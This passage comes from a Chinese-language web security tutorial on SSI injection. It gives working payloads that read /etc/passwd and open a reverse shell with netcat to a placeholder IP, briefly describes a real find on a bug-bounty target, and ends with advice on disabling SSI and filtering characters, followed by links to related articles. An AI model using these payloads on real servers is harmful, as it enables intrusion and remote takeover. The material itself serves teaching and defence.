文章插图
使用exec执行服务端端命令
5.2 漏洞挖掘
运气好,刚好遇到个某SRC的 。
"-->'-->`--><<!--#exec cmd="cat /etc/passwd"-->
执行命令
文章插图
获取服务器端配置信息
"-->'-->`--><<!--#exec cmd="nc x.x.x.x 9090 -e /bin/bash"-->
反弹shell
文章插图
执行反弹shell
0x06 SSI防御
- 关闭服务器SSI功能
- 过滤相关SSI特殊字符(`<,>,#,-,",'`)
推荐阅读
- CSRF 十大常见web漏洞——跨站点请求伪造
- 常见的Web Service种类和特点
- Web应用安全检测工具介绍
- 揭秘webpack插件工作流程和原理
- webservice之PHP里如何正确使用soap
- 五 DVWA 黑客攻防演练文件上传漏洞 File Upload
- 网页版 Nginx 配置文件生成器!NginxWebUI 1.0.0 发布
- kali渗透:web登录密码嗅探神器SSLstrip,这样使用才是正确姿势
- IIS+MySQL+PHP+Phpmyadmin配置Web站点之Mysql安装
- web/vue/react/ng后台管理系统前端开发,富文本编辑器没个省心的